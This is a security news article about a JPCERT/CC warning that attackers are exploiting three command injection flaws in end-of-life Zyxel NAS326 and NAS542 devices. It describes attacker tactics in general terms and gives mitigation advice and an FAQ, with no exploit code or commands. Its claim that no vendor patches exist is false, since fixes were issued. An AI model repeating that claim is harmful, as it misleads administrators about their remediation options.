𝗝𝗣𝗖𝗘𝗥𝗧/𝗖𝗖 issued a nationwide warning after researchers observed attackers exploiting multiple command injection vulnerabilities in Zyxel NAS devices that many organizations still operate on internal and remote-accessible networks. These flaws, which affect end-of-life NAS models, now give threat actors direct paths to arbitrary command execution, full device takeover, and eventual entry into broader environments that depend on the compromised NAS units for storage or backups.
𝗧𝗵𝗲 𝗮𝗰𝘁𝗶𝘃𝗲 𝗲𝘅𝗽𝗹𝗼𝗶𝘁𝘀 appear widespread. Attackers rapidly scan vulnerable appliances, execute injected payloads, and deploy automation to maintain control. Because these devices often sit in trusted network zones, every successful compromise carries downstream risk to additional assets.
𝗝𝗣𝗖𝗘𝗥𝗧 confirmed exploitation of three specific vulnerabilities tracked as CVE-2024-29972, CVE-2024-29973, and CVE-2024-29974. These bugs impact Zyxel NAS326 and NAS542 devices, which reached end-of-support earlier in 2023. Attackers now aggressively abuse these flaws because no vendor patches remain available, and many organizations leave their NAS web interfaces exposed.
𝗔𝗹𝗹 𝘁𝗵𝗿𝗲𝗲 𝗰𝗼𝗺𝗺𝗮𝗻𝗱 𝗶𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 𝗯𝘂𝗴𝘀 allow unauthenticated attackers to push arbitrary commands directly into the firmware’s request-handling components. And since many deployments rely on default configurations, exploitation often requires no credentials. This makes these flaws ideal for botnet operators, cryptomining crews, and access brokers that sell footholds to ransomware affiliates.
𝐒𝐡𝐚𝐝𝐨𝐰𝐕𝟐-𝐬𝐭𝐲𝐥𝐞 𝐜𝐚𝐦𝐩𝐚𝐢𝐠𝐧𝐬 𝐚𝐫𝐞 𝐛𝐞𝐠𝐢𝐧𝐧𝐢𝐧𝐠 𝐭𝐨 𝐭𝐨𝐮𝐜𝐡 𝐭𝐡𝐞𝐬𝐞 𝐝𝐞𝐯𝐢𝐜𝐞𝐬, and researchers already link some exploitation waves to infrastructure associated with credential-harvesting and lateral-movement frameworks. While no single actor exclusively owns these vulnerabilities, the activity pattern resembles opportunistic, mass-scale harvesting designed to expand access inventories rapidly.
𝗔𝘁𝘁𝗮𝗰𝗸 𝘁𝗲𝗰𝗵𝗻𝗶𝗾𝘂𝗲: 𝗳𝗮𝘀𝘁 𝘀𝗰𝗮𝗻, 𝗳𝗮𝘀𝘁 𝗶𝗻𝗷𝗲𝗰𝘁, 𝗳𝗮𝘀𝘁 𝗽𝗲𝗿𝘀𝗶𝘀𝘁
𝗔𝗰𝘁𝗶𝘃𝗲 𝗲𝘅𝗽𝗹𝗼𝗶𝘁 𝗽𝗮𝘁𝘁𝗲𝗿𝗻𝘀 𝗝𝗣𝗖𝗘𝗥𝗧 𝗶𝘀 𝘀𝗲𝗲𝗶𝗻𝗴
Attackers aggressively hunt exposed NAS units by scanning for the vulnerable web endpoints. As soon as they identify a target, they inject commands that fetch remote payloads, create persistence through scheduled tasks or modified startup scripts, and open tunnels to external infrastructure. Because these NAS devices often store corporate data or backups, this foothold enables adversaries to harvest sensitive files and map adjacent network segments.
𝗪𝗵𝘆 𝘁𝗵𝗲𝘀𝗲 𝗲𝗻𝗱-𝗼𝗳-𝗹𝗶𝗳𝗲 𝗱𝗲𝘃𝗶𝗰𝗲𝘀 𝗿𝗲𝗺𝗮𝗶𝗻 𝗵𝗶𝗴𝗵-𝘃𝗮𝗹𝘂𝗲
Although Zyxel retired support, many organizations continue to depend on these NAS systems because they sit deep within legacy workflows. Attackers understand this operational inertia. Since no patches exist, the devices offer an evergreen entry route. That combination makes them ideal for long-term exploitation, especially when the NAS stores internal documentation, VM images, intellectual property or unencrypted datasets.
𝗥𝗮𝗻𝘀𝗼𝗺𝘄𝗮𝗿𝗲 𝗴𝗿𝗼𝘂𝗽𝘀 𝗰𝗮𝗻 𝗮𝗯𝘂𝘀𝗲 𝗰𝗼𝗺𝗽𝗿𝗼𝗺𝗶𝘀𝗲𝗱 𝗡𝗔𝗦 𝘂𝗻𝗶𝘁𝘀 𝗮𝘀 𝗲𝗻𝘁𝗿𝘆 𝗽𝗼𝗶𝗻𝘁𝘀
Because threat actors frequently pair command injection with credential theft and network pivoting, these Zyxel NAS flaws offer a straightforward way to set the stage for ransomware. Once attackers gain a foothold, they often enumerate SMB shares, search for privileged accounts, and stage encryption tooling inside the trusted network. With NAS devices acting as storage hubs, ransomware operators can use them to move laterally or corrupt backups.
𝗝𝗣𝗖𝗘𝗥𝗧’𝘀 𝗮𝗱𝘃𝗶𝗰𝗲: 𝗶𝘀𝗼𝗹𝗮𝘁𝗲 𝗶𝗺𝗺𝗲𝗱𝗶𝗮𝘁𝗲𝗹𝘆
JPCERT urges organizations to remove NAS326 and NAS542 devices from external exposure, physically isolate them if necessary, and replace them with supported hardware. Although some defenders attempt to mitigate command injection by applying firewall rules or restricting known URLs, attackers typically bypass superficial blocking by leveraging alternate execution points or chaining multiple injection vectors.
𝗪𝗵𝘆 𝘁𝗵𝗶𝘀 𝗺𝗮𝘁𝘁𝗲𝗿𝘀 𝗳𝗼𝗿 𝗼𝗿𝗴𝗮𝗻𝗶𝘇𝗮𝘁𝗶𝗼𝗻𝘀 𝗶𝗻 𝟮𝟬𝟮𝟱
Organizations continue shifting toward hybrid infrastructures, and adversaries increasingly exploit overlooked appliances to bridge cloud and on-prem environments. Consequently, compromised NAS systems now create bidirectional risk: attackers can steal data from internal shares while using the NAS to exfiltrate cloud credentials or API keys stored within developer backups. Because many emerging campaigns focus on credential harvesting as a precursor to ransomware, every compromised NAS introduces strategic exposure that far exceeds the appliance’s original role.
FAQs
𝗤: 𝗛𝗼𝘄 𝗱𝗼 𝗜 𝗸𝗻𝗼𝘄 𝗶𝗳 𝗺𝘆 𝗡𝗔𝗦𝟯𝟮𝟲 𝗼𝗿 𝗡𝗔𝗦𝟱𝟰𝟮 𝗶𝘀 𝗰𝗼𝗺𝗽𝗿𝗼𝗺𝗶𝘀𝗲𝗱?
You can check for suspicious processes, unexpected scheduled tasks, new startup scripts, unexplained outbound traffic, or unknown binaries stored within user-accessible shares. Because attackers often modify configuration files, any unexpected behavior should trigger deeper forensic review.
𝗤: 𝗖𝗮𝗻 𝗜 𝗺𝗶𝘁𝗶𝗴𝗮𝘁𝗲 𝘁𝗵𝗲𝘀𝗲 𝗳𝗹𝗮𝘄𝘀 𝘄𝗶𝘁𝗵𝗼𝘂𝘁 𝗿𝗲𝗽𝗹𝗮𝗰𝗶𝗻𝗴 𝘁𝗵𝗲 𝗱𝗲𝘃𝗶𝗰𝗲?
Replacement remains the only reliable long-term path. While network isolation lowers exposure, determined attackers still find paths to execution if the device stays reachable.
𝗤: 𝗪𝗵𝘆 𝗱𝗼 𝗮𝘁𝘁𝗮𝗰𝗸𝗲𝗿𝘀 𝘁𝗮𝗿𝗴𝗲𝘁 𝗲𝗻𝗱-𝗼𝗳-𝘀𝘂𝗽𝗽𝗼𝗿𝘁 𝗵𝗮𝗿𝗱𝘄𝗮𝗿𝗲?
Attackers value predictable, unpatchable systems because each one provides a guaranteed entry point. As defenders retire other vulnerable equipment, EoL storage appliances now represent high-value footholds.
